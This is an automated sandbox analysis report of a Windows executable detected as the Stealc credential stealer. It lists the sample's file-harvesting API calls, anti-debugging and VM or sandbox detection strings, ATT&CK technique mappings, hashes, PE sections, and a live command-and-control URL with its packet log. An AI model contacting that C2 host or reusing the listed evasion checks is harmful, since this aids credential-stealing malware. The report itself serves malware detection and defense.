                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38818
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003740F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003740F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0036E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00361710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00361710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0036F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003747C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003747C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00373B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00373B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00374B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00374B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0036DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0036EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0036BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0036DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00361160 GetSystemInfo,ExitProcess,0_2_00361160
                Source: file.exe, file.exe, 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2107623366.0000000000F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxv
                Source: file.exe, 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware]
                Source: file.exe, 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2107623366.0000000000F93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37631
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37685
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37634
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37645
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37519
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37653
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00364610 VirtualProtect ?,00000004,00000100,000000000_2_00364610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00379BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379AA0 mov eax, dword ptr fs:[00000030h]0_2_00379AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00377690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00377690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4448, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00379790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003798E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_003798E0
                Source: file.exe, file.exe, 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: IProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A75A8 cpuid 0_2_003A75A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00377D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00377B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00377B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003779E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003779E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00377BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00377BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2057789916.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4448, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2057789916.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4448, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php/sfile.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206file.exe, 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.206/Jfile.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/wsfile.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.phpEsfile.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/6c4adf523b719729.php%file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1545193
                                  Start date and time:2024-10-30 08:21:07 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 14s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 127
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.958646180025865
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'104'320 bytes
                                  MD5:08c45770fb113a8cc6eabcf3eb588ca6
                                  SHA1:a034829953fc29313687c189cff3990faa2cb3d1
                                  SHA256:93faedac76dce091632f52fcbabc5e2148ad2e9e145e2f44bdf733416301c15b
                                  SHA512:0daee38b3e3067ed0873b733e0f9a65fce1ec5e50a56d47d6251829655614c156d03374e26537d0690fa572f3766fd0ffc185ce91c51f5f536383737254508f6
                                  SSDEEP:49152:Rv1JdNdoT6VBZwuqSZn4cS8NoLaQovdaA3yCkQ:RvBe6dqbGo+Qovda+yU
                                  TLSH:33A533615912C1C8CBCCBD3B73761912A87AA28C752B668B778D9403D4E6DBF11172FC
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xb1b000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F51CCF5459Ah
                                  psubd mm3, qword ptr [edi]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x2e70000x676000fb02670bb39bf8e3d6c224b16bb0368unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x2ea0000x2990000x20050e164b4c94af9cefc8fbd607d0abbddunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  qogoldvk0x5830000x1970000x196c006e754aad1857b156add702bcc20f6e32False0.9947474502535341data7.95459631398814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  tvuayiyt0x71a0000x10000x400e076ce68b960174fcd253756b5678df8False0.8291015625data6.4686041480574605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x71b0000x30000x22000c268ce32e4949b4a44d2d05cf7c1b88False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-30T08:22:06.290913+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 30, 2024 08:22:04.780353069 CET4970480192.168.2.5185.215.113.206
                                  Oct 30, 2024 08:22:04.837630033 CET8049704185.215.113.206192.168.2.5
                                  Oct 30, 2024 08:22:04.837735891 CET4970480192.168.2.5185.215.113.206
                                  Oct 30, 2024 08:22:04.837877035 CET4970480192.168.2.5185.215.113.206
                                  Oct 30, 2024 08:22:04.843225002 CET8049704185.215.113.206192.168.2.5
                                  Oct 30, 2024 08:22:05.759641886 CET8049704185.215.113.206192.168.2.5
                                  Oct 30, 2024 08:22:05.759730101 CET4970480192.168.2.5185.215.113.206
                                  Oct 30, 2024 08:22:05.995903015 CET4970480192.168.2.5185.215.113.206
                                  Oct 30, 2024 08:22:06.001944065 CET8049704185.215.113.206192.168.2.5
                                  Oct 30, 2024 08:22:06.290826082 CET8049704185.215.113.206192.168.2.5
                                  Oct 30, 2024 08:22:06.290913105 CET4970480192.168.2.5185.215.113.206
                                  Oct 30, 2024 08:22:09.254595995 CET4970480192.168.2.5185.215.113.206

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

